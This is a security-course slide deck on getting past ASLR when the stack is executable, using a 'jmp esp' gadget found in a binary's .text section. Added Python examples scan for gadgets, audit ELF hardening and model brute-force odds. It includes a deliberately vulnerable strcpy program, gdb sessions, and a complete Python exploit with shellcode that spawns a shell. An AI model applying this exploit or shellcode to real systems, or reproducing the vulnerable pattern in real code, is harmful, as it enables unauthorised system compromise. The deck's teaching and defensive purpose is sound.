07 - Bypassing ASLR, or why X^W matters
Alexandre Moneger
* Introduction to ASLR bypass
1. Bypassing ASLR, why DEP matters
Alex Moneger, Security Engineer
2. Refresher
* Classic buffer overflows store the shellcode on the stack
* Shellcode is executed on the stack
* Execution transfer is done by jumping to a fixed address
* In modern OSs, addresses are randomized using ASLR
* Is there a zone which is not covered by ASLR? Can we exploit this?
© 2013-2014 Cisco and/or its affiliates. All rights reserved. Cisco Confidential
3. Jmp reg
4. Approach
* Consider DEP disabled. What impact does it have?
* DEP disabled = execution on the stack
* How can we transfer execution to the stack, without using fixed addresses?
* Maybe we can find a piece of code in the binary itself to do that?
* Which asm constructs redirect control flow? call and jmp
5. Where to look?
* Remember, the .text section is not subject to ASLR unless explicitly requested from the compiler (-pie -fpie)
* The .text section is the only RE (read/execute) region which has fixed addresses
* Looks suitable to look for things which have a fixed address
6. How to look
Manually:
    dahtah@kali:~/src/seccon/ch6$ objdump -d -j .text -M intel ch6 | egrep "jmp|call" | egrep -v "(call|jmp)[ \t]+80"
     8048387:   ff d0                   call   eax
     80483c4:   ff d2                   call   edx
     804840f:   ff d0                   call   eax
     804841f:   ff e4                   jmp    esp
     80484d4:   ff 94 b3 00 ff ff ff    call   DWORD PTR [ebx+esi*4-0x100]
A few nice ones. jmp esp looks great. Remember what your stack looks like, just before the return to seip.
7. Lazy searching
* ROPeme is really nice, but is ROP oriented
* Therefore, only finds call/jmp preceding a ret
    dahtah@kali:~/src/seccon/ch6$ ropshell.py
    Simple ROP interactive shell: [generate, load, search] gadgets
    ROPeMe> generate ch6 4
    Generating gadgets for ch6 with backward depth=4
    It may take few minutes depends on the depth and file size...
    Processing code block 1/1
    Generated 96 gadgets
    Dumping asm gadgets to file: ch6.ggt ...
    OK
    ROPeMe> search jmp %
    Searching for ROP gadget:  jmp % with constraints: []
    0x804841fL: jmp esp ; pop ebp ;;
    0x80483a0L: jmp far 0x75f8:0xd1d0011f ; add dh bl ;;
    ROPeMe> search call %
    Searching for ROP gadget:  call % with constraints: []
    0x8048387L: call eax ; leave ;;
    0x80483c4L: call edx ; leave ;;
8. Proper searching
* Write asm and generate the raw binary (or look up the opcodes)
* Search for those bytes in memory
* The x86 ISA specifies that opcodes:
  1. have a variable-length structure
  2. eip does not have to land on 4-byte boundaries
* This approach can yield additional results when you know what you're looking for (which you should ;))
9. Example, 1
Write and compile the gadget you're looking for:
    cisco@kali:~/src/seccon/ch6$ pygmentize -g jmp_esp.asm
    [bits 32]
    section .text:
    jmp esp
    cisco@kali:~/src/seccon/ch6$ nasm jmp_esp.asm
    cisco@kali:~/src/seccon/ch6$ hexdump jmp_esp
    0000000 e4ff
    0000002
10. Example, 2
Search for the hex pattern using gdb:
    cisco@kali:~/src/seccon/ch6$ invoke -d ch6 AAAA
    Reading symbols from /home/cisco/src/seccon/ch6/ch6...done.
    gdb$ break main
    Breakpoint 1 at 0x8048465: file ch6.c, line 16.
    gdb$ r
    Breakpoint 1, main (argc=2, argv=0xbffffe34) at ch6.c:16
    16        vuln(argv[1]);
    gdb$ info proc mappings
    process 30215
    Mapped address spaces:
        Start Addr   End Addr       Size     Offset objfile
         0x8048000  0x8049000     0x1000          0 /home/dahtah/src/seccon/ch6/ch6
    gdb$ find /h 0x8048000,0x8049000,0xe4ff
    0x804841f <useless+3>
    1 pattern found.
    gdb$ x/i 0x804841f
       0x804841f <useless+3>:    jmp    esp
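The byte-level search of slides 8 through 10, as an added example that is not part of the slides or the ch6 binary: a constructed stand-in for a non-PIE .text section is scanned at every byte offset for the `ff e4` sequence (the `0xe4ff` halfword nasm and `gdb find /h` show), and each hit is labelled by whether it sits on an instruction boundary. The section bytes, the load address and the instruction-boundary table are assumptions built into the example; the second hit lies inside the immediate of a `mov`, which is exactly the kind of sequence an objdump-based search never lists and which an audit of a fixed-address binary should still count.

```python
import struct

# Constructed stand-in for the bytes of a non-PIE .text section (not the ch6
# binary from the slides). What was laid down, by byte offset:
#   0:  55              push ebp
#   1:  89 e5           mov  ebp, esp
#   3:  ff e4           jmp  esp             <- intended gadget, as in useless()
#   5:  b8 00 ff e4 00  mov  eax, 0x00e4ff00 <- immediate happens to contain ff e4
#   10: c3              ret
TEXT_BYTES = bytes.fromhex("55 89e5 ffe4 b800ffe400 c3")
TEXT_BASE = 0x08048000          # assumed load address of the constructed section
INSN_STARTS = {0, 1, 3, 5, 10}  # instruction boundaries of the listing above


def halfword_pattern(value):
    """Encode a value the way nasm's hexdump and `gdb find /h` present it:
    the slides' 0xe4ff halfword is the byte sequence ff e4 in memory."""
    return struct.pack("<H", value)


def find_pattern(section, base, pattern):
    """Return the virtual address of every occurrence of `pattern` in
    `section`, scanning at every byte offset rather than on instruction or
    4-byte boundaries, which is what slide 8 means by 'proper searching'."""
    hits, start = [], 0
    while True:
        idx = section.find(pattern, start)
        if idx < 0:
            return hits
        hits.append(base + idx)
        start = idx + 1


def classify_hits(section, base, pattern, insn_starts):
    """Pair each hit with whether it lies on a real instruction boundary.
    A hit inside another instruction's operand is still reachable by a jump,
    which is why a search over objdump's listing misses some sequences."""
    return [(addr, (addr - base) in insn_starts)
            for addr in find_pattern(section, base, pattern)]


if __name__ == "__main__":
    for addr, aligned in classify_hits(TEXT_BYTES, TEXT_BASE,
                                       halfword_pattern(0xe4ff), INSN_STARTS):
        where = "instruction boundary" if aligned else "inside another instruction"
        print("0x%08x: ff e4 (jmp esp) found at %s" % (addr, where))
```

The same scan applied to a real binary would read the bytes of its .text section from the file; the point of the constructed input is that the two hits are reported at 0x8048003 and 0x8048007, and only the first is an instruction the compiler emitted.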
11. Check what we can use
* Check the registers upon return of the vulnerable function
* Does anything point to, or hold a pointer to, anything interesting?
    cisco@kali:~/src/seccon/ch6$ invoke -d ch6 AAAA
    Reading symbols from /home/cisco/src/seccon/ch6/ch6...done.
    gdb$ disassemble 0x08048459,0x0804845c
    Dump of assembler code from 0x8048459 to 0x804845c:
       0x08048459 <vuln+54>:    pop    edi
       0x0804845a <vuln+55>:    pop    ebp
       0x0804845b <vuln+56>:    ret
    End of assembler dump.
    gdb$ break *0x0804845b
    Breakpoint 1 at 0x804845b: file ch6.c, line 13.
    gdb$ info registers
    eax    0x1           1
    ecx    0x0           0
    edx    0x5           5
    ebx    0xb7fbeff4    -1208225804
    esp    0xbffffd6c    0xbffffd6c
    ebp    0xbffffd88    0xbffffd88
    esi    0x0           0
    edi    0x0           0
    eip    0x804845b     0x804845b <vuln+56>
12. Example
Check registers, nothing looks great. esp maybe?
    gdb$ p/x &buf
    $1 = 0xbffffcfc
    gdb$ # Check buf + overflow length
    gdb$ p/x 0xbffffcfc + 0x74
    $5 = 0xbffffd70
    gdb$ # Move past ret, where is esp
    gdb$ si
    0x8048475 <main+25>:    mov    eax,0x0
    gdb$ info registers esp
    esp    0xbffffd70    0xbffffd70
    gdb$ # esp points to our shellcode!
13. Flow
1. Find a register pointing to our buffer
2. Put the shellcode in the right position
3. Find a jmp/call to reg
4. Overflow seip with the address of jmp/call reg
5. Execute shellcode upon ret
Stack after the overflow, as drawn on the slide:
    shellcode
    &jmp_esp
    0x41414141
    0x41414141
    0x41414141
    0x41414141
    0x41414141
14. Example
Same vulnerable program, but with ASLR on:
    cisco@kali:~/src/seccon/ch6$ pygmentize -g ch6.c
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>

    void useless(void) {
        __asm__("jmp *%esp");
    }

    int vuln(const char *stuff) {
        char buf[0x64] = {0};
        strcpy(buf, stuff);
        return 1;
    }

    int main(int argc, char **argv) {
        vuln(argv[1]);
        return 0;
    }
15. Exploit conditions
ASLR on, DEP off:
    cisco@kali:~/src/seccon/ch6$ /sbin/sysctl -a 2>/dev/null | grep randomize
    kernel.randomize_va_space = 2
    cisco@kali:~/src/seccon/ch6$ cc ch6.c -fno-stack-protector -U_FORTIFY_SOURCE -z execstack -g -o ch6
    cisco@kali:~/src/seccon/ch6$ ldd ch6
        linux-gate.so.1 =>  (0xb778d000)
        libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb760c000)
        /lib/ld-linux.so.2 (0xb778e000)
    cisco@kali:~/src/seccon/ch6$ ldd ch6
        linux-gate.so.1 =>  (0xb77bc000)
        libc.so.6 => /lib/i386-linux-gnu/i686/cmov/libc.so.6 (0xb763b000)
        /lib/ld-linux.so.2 (0xb77bd000)
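Slides 5 and 15 together name the two binary properties that decide whether this whole technique applies: a non-PIE link leaves .text at a fixed address, and `-z execstack` leaves the stack executable. The following is an added example, not code from the slides, that reads those two facts straight from ELF headers the way a build-time hardening check would: `e_type` is ET_DYN for a PIE executable, and the PT_GNU_STACK program header carries the stack's PF_X bit. The ELF images it inspects are constructed in-line (a bare header plus one program header, nothing loadable), and the treatment of a missing PT_GNU_STACK as an executable stack follows the historical Linux behaviour for 32-bit x86; the ch6 binary itself is not on the page as bytes, so it is not parsed here.

```python
import struct

ET_EXEC, ET_DYN = 2, 3           # e_type: fixed-address executable vs PIE
PT_GNU_STACK = 0x6474E551        # program header carrying the stack permissions
PF_X = 0x1


def build_elf32(e_type, stack_flags):
    """Construct a minimal little-endian 32-bit ELF image (not loadable, and not
    the ch6 binary from the slides): a 52-byte header followed by a single
    PT_GNU_STACK program header whose p_flags are `stack_flags`."""
    ehdr = struct.pack(
        "<4sBBBBB7sHHIIIIIHHHHHH",
        b"\x7fELF", 1, 1, 1, 0, 0, b"\0" * 7,   # ELFCLASS32, ELFDATA2LSB, EV_CURRENT
        e_type, 3, 1,                           # e_type, EM_386, e_version
        0x08048000, 52, 0, 0,                   # e_entry, e_phoff, e_shoff, e_flags
        52, 32, 1, 40, 0, 0)                    # e_ehsize, e_phentsize, e_phnum, ...
    phdr = struct.pack("<8I", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr


def audit_elf32(data):
    """Report the two hardening properties the slides hinge on:
    pie        -> .text is relocated, so gadgets in it have no fixed address
    exec_stack -> DEP is off for the stack, so shellcode placed there can run"""
    if data[:4] != b"\x7fELF" or data[4] != 1:
        raise ValueError("not a 32-bit ELF image")
    (e_type,) = struct.unpack_from("<H", data, 16)
    (e_phoff,) = struct.unpack_from("<I", data, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 42)
    # Historical Linux behaviour on 32-bit x86: no PT_GNU_STACK means an
    # executable stack, so start from that and let the header override it.
    exec_stack = True
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from("<I", data, off)
        (p_flags,) = struct.unpack_from("<I", data, off + 24)   # p_flags is the 7th field
        if p_type == PT_GNU_STACK:
            exec_stack = bool(p_flags & PF_X)
    return {"pie": e_type == ET_DYN, "exec_stack": exec_stack}


def text_has_fixed_address(report, randomize_va_space):
    """Combine the binary's properties with the sysctl from slide 15:
    .text keeps a fixed address if the binary is not PIE or ASLR is off."""
    return not report["pie"] or randomize_va_space == 0


if __name__ == "__main__":
    lab_like = audit_elf32(build_elf32(ET_EXEC, 0x6 | PF_X))   # no -pie, -z execstack
    hardened = audit_elf32(build_elf32(ET_DYN, 0x6))           # PIE, non-executable stack
    print("lab-like:", lab_like, "fixed .text:", text_has_fixed_address(lab_like, 2))
    print("hardened:", hardened, "fixed .text:", text_has_fixed_address(hardened, 2))
```

Run against a real file, `audit_elf32(open(path, "rb").read())` gives the same two answers that `readelf -h` (Type: DYN vs EXEC) and `readelf -l` (GNU_STACK flags) would, which is the check to put in a build pipeline so a binary like the slide's `cc ... -z execstack` one never ships by accident.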
16. Exploit
    dahtah@kali:~/src/seccon/ch6$ pygmentize -g ch6.py
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import os
    import struct

    target = "ch6"
    overflow_len = 112
    jmp_esp = 0x0804841f
    target_path = os.path.abspath(target)

    # setreuid(geteuid(),geteuid()); execve("/bin/sh",0,0)
    sc = ("\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46"
          "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68"
          "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80")
    jmp_esp_addr = struct.pack("<I", jmp_esp)
    ex = "%s%s%s" % ('A'*overflow_len, jmp_esp_addr, sc)
    os.execve(target_path, (target_path, ex), os.environ)
17. Other approaches
18. Bruteforce
If you can try multiple times, bruteforce is an option:
1. Pick an address for your buffer
2. Pad your shellcode with a NOP sled
3. Make your return address land in the middle of the NOP sled
4. Try once, then try again
5. and again, and again
6. Get shell
Bruteforcing figures provided in ASLR section
19. Conclusion
20. Key points
* ASLR is not very effective without DEP
* ASLR effectiveness is limited on 32 bits
* On a real-world binary, the chances you can find good gadgets are high
* Depending on gadgets and values in registers, not all bugs are cleanly exploitable with ASLR
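Slide 18 lists the bruteforce procedure and the key points above state that ASLR is weak on 32 bits; the slides defer the actual figures to the ASLR section. The following is an added example, not the slides' own numbers, that models what those figures look like: a fixed guess against a NOP sled is a geometric trial, so the expected number of attempts falls straight out of the entropy of the randomized region and the sled length. The candidate-base counts used for the 32-bit and 64-bit runs (2**11 and 2**22) and the 64 KiB sled are illustrative assumptions. The defender-side quantity is included too: every failed attempt is a crash of the target, so the expected crash count is what crash monitoring should be alerting on long before the last try.

```python
import math


def hit_probability(positions, sled_len, granularity=4096):
    """Probability that one fixed guess lands inside a NOP sled when the
    randomizer picks the buffer's base uniformly from `positions` candidates
    spaced `granularity` bytes apart. The guess hits for every base that puts
    the sled over it: about sled_len // granularity of them (at least the one
    exact match, at most all of them)."""
    covering = min(max(sled_len // granularity, 1), positions)
    return covering / positions


def expected_tries(p):
    """Mean number of attempts until the first success (geometric distribution)."""
    return 1.0 / p


def tries_for_confidence(p, confidence):
    """Smallest number of attempts after which P(at least one success) >= confidence."""
    if p >= 1.0:
        return 1
    return math.ceil(math.log(1.0 - confidence) / math.log(1.0 - p))


def expected_crashes(p):
    """Every failed attempt kills the target, so the defender's signal is the
    crash count: one fewer than the expected number of tries."""
    return expected_tries(p) - 1


if __name__ == "__main__":
    sled = 64 * 1024   # constructed: a 64 KiB NOP sled
    # Illustrative entropy figures (assumptions, not the slides' numbers):
    # 2**11 candidate page-aligned bases for a 32-bit stack, 2**22 for 64-bit.
    for bits, label in ((11, "32-bit"), (22, "64-bit")):
        p = hit_probability(2 ** bits, sled)
        print("%s: p=%.2e, expected tries=%.0f, 99%% within %d tries, ~%.0f crashes"
              % (label, p, expected_tries(p), tries_for_confidence(p, 0.99),
                 expected_crashes(p)))
```

With the 32-bit assumption the model predicts 128 expected attempts and 99% success within 588, i.e. a burst of over a hundred segfaults from one service in a short window; the 64-bit assumption puts the expectation in the hundreds of thousands, which is the quantitative form of "ASLR effectiveness is limited on 32 bits".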
21. Get to work
* Exploit ch6 with ASLR enabled
* Check the memory mappings of ch6. What is predictable? What changes?
* Search for various gadgets using nasm and gdb
* Bruteforce ch6 (do not rely on gadgets). How many tries does it take? How long?